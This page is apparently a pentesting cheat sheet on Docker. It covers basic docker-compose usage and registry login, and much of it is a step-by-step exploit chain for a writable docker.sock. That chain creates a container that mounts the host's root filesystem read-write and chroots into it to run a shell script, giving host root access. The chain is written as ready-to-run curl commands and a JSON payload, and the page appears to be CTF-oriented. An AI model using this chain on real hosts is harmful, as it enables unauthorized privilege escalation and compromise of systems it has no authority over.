Docker
Configurations.
## ------------------| docker-compose.yaml
version: "3" ## optional since v1.27.0
services:
website: ## Service name
image: nginx
ports:
- "8080:80"
restart: always ## Alwasys start when machine reboot
## ------------------| Start/Stop
### Start/Run
sudo docker-compose up -d
### Stop/Down
sudo docker-compose stop
sudo docker-compose down
Is
Docker Sock
is writable ?
## ------------------| How to check
ls -al /var/run/docker.sock
## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/)
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
## ------------------| Expolit chain
### Create new container--> map root drive
### We need to know what image we can use; use following command and get RepoTags value.
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]'
### Create json object in file !!! Remove comments!!!
{
"Image" : "sandbox", ## <---- RepoTags value
"Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell
"Binds" : [
"/:/mnt:rw"
]
}
### use curl command to create new container
curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create
### Get id value; replace; start
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
Login
## ------------------| Normal login
docker login <URL>
## ------------------| If it has certificate file
mkdir -p /etc/docker/certs.d/<url_name>
cp ca.crt /etc/docker/certs.d/<url_name>/ca.crt
docker login <URL>
cat /etc/docker/daemon.json
{
"insecure-registries":["docker.registry.htb:443"]
}
Privilege Escalation via Portainer
Last updated